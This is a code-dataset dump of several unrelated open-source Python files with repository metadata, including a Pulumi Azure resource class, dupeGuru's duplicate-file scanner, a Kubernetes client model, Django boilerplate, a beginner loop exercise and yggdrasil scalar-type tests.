with open(os.path.join(universe.folder, 'sterile_regime_plot.dat'), 'w') as f:
writer = csv.writer(f, delimiter='\t')
for x, y in izip(*regime_data):
writer.writerow([x, y])
| [
"[email protected]"
] | |
35e75354b7f206b04d605a0e51b6af3f66379296 | 5e6d8b9989247801718dd1f10009f0f7f54c1eb4 | /sdk/python/pulumi_azure_native/containerregistry/v20201101preview/pipeline_run.py | 22803da79b10e5367a21317726f73caa4573698c | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | vivimouret29/pulumi-azure-native | d238a8f91688c9bf09d745a7280b9bf2dd6d44e0 | 1cbd988bcb2aa75a83e220cb5abeb805d6484fce | refs/heads/master | 2023-08-26T05:50:40.560691 | 2021-10-21T09:25:07 | 2021-10-21T09:25:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,038 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['PipelineRunArgs', 'PipelineRun']
@pulumi.input_type
class PipelineRunArgs:
def __init__(__self__, *,
registry_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
force_update_tag: Optional[pulumi.Input[str]] = None,
pipeline_run_name: Optional[pulumi.Input[str]] = None,
request: Optional[pulumi.Input['PipelineRunRequestArgs']] = None):
"""
The set of arguments for constructing a PipelineRun resource.
:param pulumi.Input[str] registry_name: The name of the container registry.
:param pulumi.Input[str] resource_group_name: The name of the resource group to which the container registry belongs.
:param pulumi.Input[str] force_update_tag: How the pipeline run should be forced to recreate even if the pipeline run configuration has not changed.
:param pulumi.Input[str] pipeline_run_name: The name of the pipeline run.
:param pulumi.Input['PipelineRunRequestArgs'] request: The request parameters for a pipeline run.
"""
pulumi.set(__self__, "registry_name", registry_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if force_update_tag is not None:
pulumi.set(__self__, "force_update_tag", force_update_tag)
if pipeline_run_name is not None:
pulumi.set(__self__, "pipeline_run_name", pipeline_run_name)
if request is not None:
pulumi.set(__self__, "request", request)
@property
@pulumi.getter(name="registryName")
def registry_name(self) -> pulumi.Input[str]:
"""
The name of the container registry.
"""
return pulumi.get(self, "registry_name")
@registry_name.setter
def registry_name(self, value: pulumi.Input[str]):
pulumi.set(self, "registry_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group to which the container registry belongs.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="forceUpdateTag")
def force_update_tag(self) -> Optional[pulumi.Input[str]]:
"""
How the pipeline run should be forced to recreate even if the pipeline run configuration has not changed.
"""
return pulumi.get(self, "force_update_tag")
@force_update_tag.setter
def force_update_tag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "force_update_tag", value)
@property
@pulumi.getter(name="pipelineRunName")
def pipeline_run_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the pipeline run.
"""
return pulumi.get(self, "pipeline_run_name")
@pipeline_run_name.setter
def pipeline_run_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "pipeline_run_name", value)
@property
@pulumi.getter
def request(self) -> Optional[pulumi.Input['PipelineRunRequestArgs']]:
"""
The request parameters for a pipeline run.
"""
return pulumi.get(self, "request")
@request.setter
def request(self, value: Optional[pulumi.Input['PipelineRunRequestArgs']]):
pulumi.set(self, "request", value)
class PipelineRun(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
force_update_tag: Optional[pulumi.Input[str]] = None,
pipeline_run_name: Optional[pulumi.Input[str]] = None,
registry_name: Optional[pulumi.Input[str]] = None,
request: Optional[pulumi.Input[pulumi.InputType['PipelineRunRequestArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
An object that represents a pipeline run for a container registry.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] force_update_tag: How the pipeline run should be forced to recreate even if the pipeline run configuration has not changed.
:param pulumi.Input[str] pipeline_run_name: The name of the pipeline run.
:param pulumi.Input[str] registry_name: The name of the container registry.
:param pulumi.Input[pulumi.InputType['PipelineRunRequestArgs']] request: The request parameters for a pipeline run.
:param pulumi.Input[str] resource_group_name: The name of the resource group to which the container registry belongs.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PipelineRunArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
An object that represents a pipeline run for a container registry.
:param str resource_name: The name of the resource.
:param PipelineRunArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PipelineRunArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
force_update_tag: Optional[pulumi.Input[str]] = None,
pipeline_run_name: Optional[pulumi.Input[str]] = None,
registry_name: Optional[pulumi.Input[str]] = None,
request: Optional[pulumi.Input[pulumi.InputType['PipelineRunRequestArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PipelineRunArgs.__new__(PipelineRunArgs)
__props__.__dict__["force_update_tag"] = force_update_tag
__props__.__dict__["pipeline_run_name"] = pipeline_run_name
if registry_name is None and not opts.urn:
raise TypeError("Missing required property 'registry_name'")
__props__.__dict__["registry_name"] = registry_name
__props__.__dict__["request"] = request
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["response"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:containerregistry/v20201101preview:PipelineRun"), pulumi.Alias(type_="azure-native:containerregistry:PipelineRun"), pulumi.Alias(type_="azure-nextgen:containerregistry:PipelineRun"), pulumi.Alias(type_="azure-native:containerregistry/v20191201preview:PipelineRun"), pulumi.Alias(type_="azure-nextgen:containerregistry/v20191201preview:PipelineRun"), pulumi.Alias(type_="azure-native:containerregistry/v20210601preview:PipelineRun"), pulumi.Alias(type_="azure-nextgen:containerregistry/v20210601preview:PipelineRun"), pulumi.Alias(type_="azure-native:containerregistry/v20210801preview:PipelineRun"), pulumi.Alias(type_="azure-nextgen:containerregistry/v20210801preview:PipelineRun")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(PipelineRun, __self__).__init__(
'azure-native:containerregistry/v20201101preview:PipelineRun',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'PipelineRun':
"""
Get an existing PipelineRun resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = PipelineRunArgs.__new__(PipelineRunArgs)
__props__.__dict__["force_update_tag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["request"] = None
__props__.__dict__["response"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return PipelineRun(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="forceUpdateTag")
def force_update_tag(self) -> pulumi.Output[Optional[str]]:
"""
How the pipeline run should be forced to recreate even if the pipeline run configuration has not changed.
"""
return pulumi.get(self, "force_update_tag")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of a pipeline run.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def request(self) -> pulumi.Output[Optional['outputs.PipelineRunRequestResponse']]:
"""
The request parameters for a pipeline run.
"""
return pulumi.get(self, "request")
@property
@pulumi.getter
def response(self) -> pulumi.Output['outputs.PipelineRunResponseResponse']:
"""
The response of a pipeline run.
"""
return pulumi.get(self, "response")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
Metadata pertaining to creation and last modification of the resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource.
"""
return pulumi.get(self, "type")
| [
"[email protected]"
] | |
4cbadf96fedab1c09a4b39b33bbe809cad5469b1 | 1450b93cf402661054ec4ce21cc80bf555ae370e | /core/scanner.py | c0609ba496bd8100305af4b0f96acc96f3cfe49f | [] | no_license | lambder/dupeguru | 05adee5f743071efee039b932af572d173c9c3d3 | 78db58e0995b6e9584141ab37c5c727f22c2a198 | refs/heads/master | 2020-03-30T05:40:33.973328 | 2014-11-19T16:52:19 | 2014-11-19T16:52:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,738 | py | # Created By: Virgil Dupras
# Created On: 2006/03/03
# Copyright 2014 Hardcoded Software (http://www.hardcoded.net)
#
# This software is licensed under the "BSD" License as described in the "LICENSE" file,
# which should be included with this package. The terms are also available at
# http://www.hardcoded.net/licenses/bsd_license
import logging
import re
import os.path as op
from hscommon.jobprogress import job
from hscommon.util import dedupe, rem_file_ext, get_file_ext
from hscommon.trans import tr
from . import engine
from .ignore import IgnoreList
# It's quite ugly to have scan types from all editions all put in the same class, but because there's
# there will be some nasty bugs popping up (ScanType is used in core when in should exclusively be
# used in core_*). One day I'll clean this up.
class ScanType:
Filename = 0
Fields = 1
FieldsNoOrder = 2
Tag = 3
Folders = 4
Contents = 5
ContentsAudio = 6
#PE
FuzzyBlock = 10
ExifTimestamp = 11
SCANNABLE_TAGS = ['track', 'artist', 'album', 'title', 'genre', 'year']
RE_DIGIT_ENDING = re.compile(r'\d+|\(\d+\)|\[\d+\]|{\d+}')
def is_same_with_digit(name, refname):
# Returns True if name is the same as refname, but with digits (with brackets or not) at the end
if not name.startswith(refname):
return False
end = name[len(refname):].strip()
return RE_DIGIT_ENDING.match(end) is not None
def remove_dupe_paths(files):
# Returns files with duplicates-by-path removed. Files with the exact same path are considered
# duplicates and only the first file to have a path is kept. In certain cases, we have files
# that have the same path, but not with the same case, that's why we normalize. However, we also
# have case-sensitive filesystems, and in those, we don't want to falsely remove duplicates,
# that's why we have a `samefile` mechanism.
result = []
path2file = {}
for f in files:
normalized = str(f.path).lower()
if normalized in path2file:
try:
if op.samefile(normalized, str(path2file[normalized].path)):
continue # same file, it's a dupe
else:
pass # We don't treat them as dupes
except OSError:
continue # File doesn't exist? Well, treat them as dupes
else:
path2file[normalized] = f
result.append(f)
return result
class Scanner:
def __init__(self):
self.ignore_list = IgnoreList()
self.discarded_file_count = 0
def _getmatches(self, files, j):
if self.size_threshold:
j = j.start_subjob([2, 8])
for f in j.iter_with_progress(files, tr("Read size of %d/%d files")):
f.size # pre-read, makes a smoother progress if read here (especially for bundles)
files = [f for f in files if f.size >= self.size_threshold]
if self.scan_type in {ScanType.Contents, ScanType.ContentsAudio, ScanType.Folders}:
sizeattr = 'audiosize' if self.scan_type == ScanType.ContentsAudio else 'size'
return engine.getmatches_by_contents(
files, sizeattr, partial=self.scan_type == ScanType.ContentsAudio, j=j
)
else:
j = j.start_subjob([2, 8])
kw = {}
kw['match_similar_words'] = self.match_similar_words
kw['weight_words'] = self.word_weighting
kw['min_match_percentage'] = self.min_match_percentage
if self.scan_type == ScanType.FieldsNoOrder:
self.scan_type = ScanType.Fields
kw['no_field_order'] = True
func = {
ScanType.Filename: lambda f: engine.getwords(rem_file_ext(f.name)),
ScanType.Fields: lambda f: engine.getfields(rem_file_ext(f.name)),
ScanType.Tag: lambda f: [
engine.getwords(str(getattr(f, attrname)))
for attrname in SCANNABLE_TAGS
if attrname in self.scanned_tags
],
}[self.scan_type]
for f in j.iter_with_progress(files, tr("Read metadata of %d/%d files")):
logging.debug("Reading metadata of {}".format(str(f.path)))
f.words = func(f)
return engine.getmatches(files, j=j, **kw)
@staticmethod
def _key_func(dupe):
return -dupe.size
@staticmethod
def _tie_breaker(ref, dupe):
refname = rem_file_ext(ref.name).lower()
dupename = rem_file_ext(dupe.name).lower()
if 'copy' in dupename:
return False
if 'copy' in refname:
return True
if is_same_with_digit(dupename, refname):
return False
if is_same_with_digit(refname, dupename):
return True
return len(dupe.path) > len(ref.path)
def get_dupe_groups(self, files, j=job.nulljob):
j = j.start_subjob([8, 2])
for f in (f for f in files if not hasattr(f, 'is_ref')):
f.is_ref = False
files = remove_dupe_paths(files)
logging.info("Getting matches. Scan type: %d", self.scan_type)
matches = self._getmatches(files, j)
logging.info('Found %d matches' % len(matches))
j.set_progress(100, tr("Removing false matches"))
# In removing what we call here "false matches", we first want to remove, if we scan by
# folders, we want to remove folder matches for which the parent is also in a match (they're
# "duplicated duplicates if you will). Then, we also don't want mixed file kinds if the
# option isn't enabled, we want matches for which both files exist and, lastly, we don't
# want matches with both files as ref.
if self.scan_type == ScanType.Folders and matches:
allpath = {m.first.path for m in matches}
allpath |= {m.second.path for m in matches}
sortedpaths = sorted(allpath)
toremove = set()
last_parent_path = sortedpaths[0]
for p in sortedpaths[1:]:
if p in last_parent_path:
toremove.add(p)
else:
last_parent_path = p
matches = [m for m in matches if m.first.path not in toremove or m.second.path not in toremove]
if not self.mix_file_kind:
matches = [m for m in matches if get_file_ext(m.first.name) == get_file_ext(m.second.name)]
matches = [m for m in matches if m.first.path.exists() and m.second.path.exists()]
matches = [m for m in matches if not (m.first.is_ref and m.second.is_ref)]
if self.ignore_list:
j = j.start_subjob(2)
iter_matches = j.iter_with_progress(matches, tr("Processed %d/%d matches against the ignore list"))
matches = [
m for m in iter_matches
if not self.ignore_list.AreIgnored(str(m.first.path), str(m.second.path))
]
logging.info('Grouping matches')
groups = engine.get_groups(matches, j)
matched_files = dedupe([m.first for m in matches] + [m.second for m in matches])
if self.scan_type in {ScanType.Filename, ScanType.Fields, ScanType.FieldsNoOrder, ScanType.Tag}:
self.discarded_file_count = len(matched_files) - sum(len(g) for g in groups)
else:
# Ticket #195
# To speed up the scan, we don't bother comparing contents of files that are both ref
# files. However, this messes up "discarded" counting because there's a missing match
# in cases where we end up with a dupe group anyway (with a non-ref file). Because it's
# impossible to have discarded matches in exact dupe scans, we simply set it at 0, thus
# bypassing our tricky problem.
# Also, although ScanType.FuzzyBlock is not always doing exact comparisons, we also
# bypass ref comparison, thus messing up with our "discarded" count. So we're
# effectively disabling the "discarded" feature in PE, but it's better than falsely
# reporting discarded matches.
self.discarded_file_count = 0
groups = [g for g in groups if any(not f.is_ref for f in g)]
logging.info('Created %d groups' % len(groups))
j.set_progress(100, tr("Doing group prioritization"))
for g in groups:
g.prioritize(self._key_func, self._tie_breaker)
return groups
match_similar_words = False
min_match_percentage = 80
mix_file_kind = True
scan_type = ScanType.Filename
scanned_tags = {'artist', 'title'}
size_threshold = 0
word_weighting = False
| [
"[email protected]"
] | |
099b9d0845f92ff8c2fa69e85d795893a024d24e | 7087a5dd1772c9456f098bc024a894dcaeef5432 | /backup/build/new-calkube/kubernetes-6.0.0_snapshot-py2.7.egg/kubernetes/client/models/v1_portworx_volume_source.py | 611c15aa0788155255a147f5d3ee6c627268a2b7 | [] | no_license | santhoshchami/kubecctl-python | 5be7a5a17cc6f08ec717b3eb1c11719ef7653aba | cd45af465e25b0799d65c573e841e2acb983ee68 | refs/heads/master | 2021-06-23T11:00:43.615062 | 2019-07-10T16:57:06 | 2019-07-10T16:57:06 | 145,669,246 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,234 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.10.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1PortworxVolumeSource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'fs_type': 'str',
'read_only': 'bool',
'volume_id': 'str'
}
attribute_map = {
'fs_type': 'fsType',
'read_only': 'readOnly',
'volume_id': 'volumeID'
}
def __init__(self, fs_type=None, read_only=None, volume_id=None):
"""
V1PortworxVolumeSource - a model defined in Swagger
"""
self._fs_type = None
self._read_only = None
self._volume_id = None
self.discriminator = None
if fs_type is not None:
self.fs_type = fs_type
if read_only is not None:
self.read_only = read_only
self.volume_id = volume_id
@property
def fs_type(self):
"""
Gets the fs_type of this V1PortworxVolumeSource.
FSType represents the filesystem type to mount Must be a filesystem type supported by the host operating system. Ex. \"ext4\", \"xfs\". Implicitly inferred to be \"ext4\" if unspecified.
:return: The fs_type of this V1PortworxVolumeSource.
:rtype: str
"""
return self._fs_type
@fs_type.setter
def fs_type(self, fs_type):
"""
Sets the fs_type of this V1PortworxVolumeSource.
FSType represents the filesystem type to mount Must be a filesystem type supported by the host operating system. Ex. \"ext4\", \"xfs\". Implicitly inferred to be \"ext4\" if unspecified.
:param fs_type: The fs_type of this V1PortworxVolumeSource.
:type: str
"""
self._fs_type = fs_type
@property
def read_only(self):
"""
Gets the read_only of this V1PortworxVolumeSource.
Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts.
:return: The read_only of this V1PortworxVolumeSource.
:rtype: bool
"""
return self._read_only
@read_only.setter
def read_only(self, read_only):
"""
Sets the read_only of this V1PortworxVolumeSource.
Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts.
:param read_only: The read_only of this V1PortworxVolumeSource.
:type: bool
"""
self._read_only = read_only
@property
def volume_id(self):
"""
Gets the volume_id of this V1PortworxVolumeSource.
VolumeID uniquely identifies a Portworx volume
:return: The volume_id of this V1PortworxVolumeSource.
:rtype: str
"""
return self._volume_id
@volume_id.setter
def volume_id(self, volume_id):
"""
Sets the volume_id of this V1PortworxVolumeSource.
VolumeID uniquely identifies a Portworx volume
:param volume_id: The volume_id of this V1PortworxVolumeSource.
:type: str
"""
if volume_id is None:
raise ValueError("Invalid value for `volume_id`, must not be `None`")
self._volume_id = volume_id
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1PortworxVolumeSource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"[email protected]"
] | |
1f852c2b0f5513529cfc6704d2c97b41e3789c9e | 71a6b2d96cc00b7682241f1de77f4d740e810701 | /manage.py | 5161ada7f0b2c48e36964e647c21bb195c12426c | [] | no_license | crowdbotics-apps/app1-19382 | 170e191b6d91b3e4caca7ad8227230f173bea3bd | 71d47dfcf473b48ea0285295ea5e8d37af529779 | refs/heads/master | 2022-12-01T17:29:19.786547 | 2020-08-05T00:18:25 | 2020-08-05T00:18:25 | 285,132,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 630 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'app1_19382.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
d07d642565edc59e0b0d20bb90ff23ec5090a9c4 | 835adeea55324fb9bf0f2c466ba7b740d9d35970 | /react_d/todo/todo/urls.py | 5018d5027738b9c1f8aa7c6956ee4a7267b39a52 | [] | no_license | golammahmud/react-practices-repository | 4f3524832fbcda1bd32508b9dda5d84e4920750f | 5bc3b9ee6142a9152f7ac223358c94ceb43a7ed2 | refs/heads/master | 2023-08-19T18:37:56.417089 | 2021-10-07T12:21:26 | 2021-10-07T12:21:26 | 414,583,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 855 | py | """todo URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.views.generic import TemplateView
urlpatterns = [
path('admin/', admin.site.urls),
path('' ,TemplateView.as_view(template_name="index.html")),
]
| [
"[email protected]"
] | |
6424902da0def910bde07cd8f0ed83ed1b17aece | f2a18b4a1d759cfd44aff9be13848b4bc03560d8 | /ex32.py | 2c577cdcff980c7145146272002e01dbd099382f | [] | no_license | 5h3rr1ll/LearnPythonTheHardWay | 1e740b0d4ab71c4c5218599d970001684fa58eea | 5612f768b8ce93fcc4757e8db128017f00a6c2ea | refs/heads/master | 2021-01-13T05:06:20.749196 | 2017-02-07T19:32:15 | 2017-02-07T19:32:15 | 81,246,206 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 859 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
the_count = [1, 2, 3 , 4, 5]
fruits = ["apples", "oranges", "pears", "apricots"]
change = [1, "pennies", 2, "dimes", 3, "quarters"]
# this first kind of for-loop goes through a list
for number in the_count:
print("This is count %d" % number)
# same a above
for fruit in fruits:
print("A fruit of type: %s" % fruit)
# also we can go through mixed lists too
# notice we have to use %r since we don't know what's in it
for i in change:
print("I got %r" % i)
# we can also build lists, first start with an empty one
elements = []
# then use the range function to do 0 to 5 counts
for i in range(0,6):
print("Adding %d to the list." % i)
# append is a function that lists understand
elements.append(i)
# now ew can print them out too
for i in elements:
print("Element was: %d" % i)
| [
"[email protected]"
] | |
c59b601ebf130c4026f99e5789ac8c4b76a7e310 | b198ab1d3faf79d34b1745236daa5eb02a37e18e | /yggdrasil/metaschema/datatypes/tests/test_ScalarMetaschemaType.py | 48314f79d334dfd2818bdbb8f4e1a711a6736bc8 | [
"BSD-3-Clause"
] | permissive | leighmatth/yggdrasil | 688f13aa0d274217daec9f412269fbbaf5f10aef | dcc4d75a4d2c6aaa7e50e75095a16df1df6b2b0a | refs/heads/master | 2021-07-09T10:39:25.422978 | 2021-04-14T16:40:04 | 2021-04-14T16:40:04 | 245,011,886 | 0 | 0 | NOASSERTION | 2020-03-04T21:54:25 | 2020-03-04T21:54:24 | null | UTF-8 | Python | false | false | 7,355 | py | import copy
import numpy as np
from yggdrasil import units, platform
from yggdrasil.metaschema.datatypes.tests import test_MetaschemaType as parent
from yggdrasil.metaschema.properties.ScalarMetaschemaProperties import (
_valid_types)
class TestScalarMetaschemaType(parent.TestMetaschemaType):
r"""Test class for ScalarMetaschemaType class with float."""
_mod = 'ScalarMetaschemaType'
_cls = 'ScalarMetaschemaType'
_prec = 32
_type = 'float'
_shape = 1
_array_contents = None
@staticmethod
def after_class_creation(cls):
r"""Actions to be taken during class construction."""
parent.TestMetaschemaType.after_class_creation(cls)
if not cls._explicit:
cls._typedef['subtype'] = cls._type
if cls._type == 'bytes':
dtype = 'S%d' % (cls._prec // 8)
elif cls._type == 'unicode':
dtype = 'U%d' % (cls._prec // 32)
else:
dtype = '%s%d' % (cls._type, cls._prec)
if cls._array_contents is None:
cls._array = np.ones(cls._shape, dtype)
else:
cls._array = np.array(cls._array_contents, dtype)
if cls._type in ['bytes', 'unicode']:
dtype_invalid = 'float'
else:
dtype_invalid = 'S10'
cls._invalid_array = np.ones(cls._shape, dtype_invalid)
if 'Array' not in cls._cls:
cls._value = cls._array[0]
cls._invalid_decoded.append(cls._array)
cls._invalid_decoded.append(cls._invalid_array[0])
else:
cls._value = cls._array
if cls._array.ndim == 1:
cls._invalid_decoded.append(cls._array[0])
cls._invalid_decoded.append(np.ones((3, 4), dtype))
else:
cls._invalid_decoded.append(cls._array[0][0])
cls._invalid_decoded.append(cls._array[0])
cls._invalid_decoded.append(cls._invalid_array)
cls._valid_encoded = [{'type': cls.get_import_cls().name,
'precision': cls._prec,
'units': '',
'data': cls._value.tobytes()}]
if not cls._explicit:
cls._valid_encoded[0]['subtype'] = cls._type
cls._valid_decoded = [cls._value]
if cls._type == 'bytes':
new_dtype = 'S%d' % (cls._prec * 2 // 8)
elif cls._type == 'unicode':
new_dtype = 'U%d' % (cls._prec * 2 // 32)
else:
new_dtype = '%s%d' % (cls._type, cls._prec * 2)
if platform._is_win and (new_dtype == 'float128'): # pragma: windows
cls._prec_value = None
else:
prec_array = cls._array.astype(new_dtype)
if 'Array' not in cls._cls:
cls._prec_value = prec_array[0]
else:
cls._prec_value = prec_array
cls._compatible_objects = [
(cls._value, cls._value, None)]
if cls._prec_value is not None:
if not cls._explicit:
cls._compatible_objects.append(
(cls._value, cls._prec_value, {'subtype': cls._type,
'precision': cls._prec * 2}))
else:
cls._compatible_objects.append(
(cls._value, cls._prec_value, {'precision': cls._prec * 2}))
if 'Array' not in cls._cls:
if cls._explicit:
if cls._type == 'bytes':
cls._valid_normalize = [(1, b'1'),
(u'1', b'1')]
elif cls._type == 'unicode':
cls._valid_normalize = [(1, u'1'),
(b'1', u'1')]
else:
cls._valid_normalize = [(str(cls._value), cls._value),
('hello', 'hello')]
if cls._explicit and ('Array' not in cls._cls):
cls._invalid_encoded.append({'type': 'scalar',
'subtype': 'invalid'})
cls._invalid_validate.append(np.array([None, 1, list()],
dtype=object))
def test_from_array(self):
r"""Test getting object from array."""
test_val = self._value
test_kws = {}
if 'units' in self._typedef:
test_val = units.add_units(test_val, self._typedef['units'])
test_kws['unit_str'] = self._typedef['units']
self.assert_equal(self.instance.from_array(self._array, **test_kws),
test_val)
# Dynamically create tests for dynamic and explicitly typed scalars
for t in _valid_types.keys():
iattr_imp = {'_type': t}
if t == 'complex':
iattr_imp['_prec'] = 64
elif t in ('bytes', 'unicode'):
iattr_imp['_array_contents'] = ['one', 'two', 'three']
max_len = len(max(iattr_imp['_array_contents'], key=len))
if t == 'unicode':
iattr_imp['_prec'] = max_len * 32
else:
iattr_imp['_prec'] = max_len * 8
iattr_exp = copy.deepcopy(iattr_imp)
iattr_exp['_cls'] = '%sMetaschemaType' % t.title()
iattr_exp['_explicit'] = True
if t == 'float':
iattr_exp['_prec'] = 64
cls_imp = type('TestScalarMetaschemaType_%s' % t,
(TestScalarMetaschemaType, ), iattr_imp)
cls_exp = type('Test%s' % iattr_exp['_cls'],
(TestScalarMetaschemaType, ), iattr_exp)
globals()[cls_imp.__name__] = cls_imp
globals()[cls_exp.__name__] = cls_exp
del cls_imp, cls_exp
class TestScalarMetaschemaType_prec(TestScalarMetaschemaType):
r"""Test class for ScalarMetaschemaType class with precision."""
@staticmethod
def after_class_creation(cls):
r"""Actions to be taken during class construction."""
TestScalarMetaschemaType.after_class_creation(cls)
cls._typedef['precision'] = cls._prec
cls._valid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
for x in cls._invalid_encoded:
x['precision'] = cls._prec / 2 # compatible precision
# Version with incorrect precision
cls._invalid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
if cls._prec_value is not None:
cls._invalid_encoded[-1]['precision'] = cls._prec * 2
cls._invalid_decoded.append(cls._prec_value)
class TestScalarMetaschemaType_units(TestScalarMetaschemaType):
r"""Test class for ScalarMetaschemaType class with units."""
@staticmethod
def after_class_creation(cls):
r"""Actions to be taken during class construction."""
TestScalarMetaschemaType.after_class_creation(cls)
cls._typedef['units'] = 'cm'
cls._valid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
cls._valid_encoded[-1]['units'] = 'cm'
cls._valid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
cls._valid_encoded[-1]['units'] = 'm'
cls._valid_decoded.append(copy.deepcopy(cls._valid_decoded[0]))
cls._valid_decoded[-1] = units.add_units(cls._valid_decoded[-1], 'm')
# Version with incorrect units
cls._invalid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
cls._invalid_encoded[-1]['units'] = 's'
| [
"[email protected]"
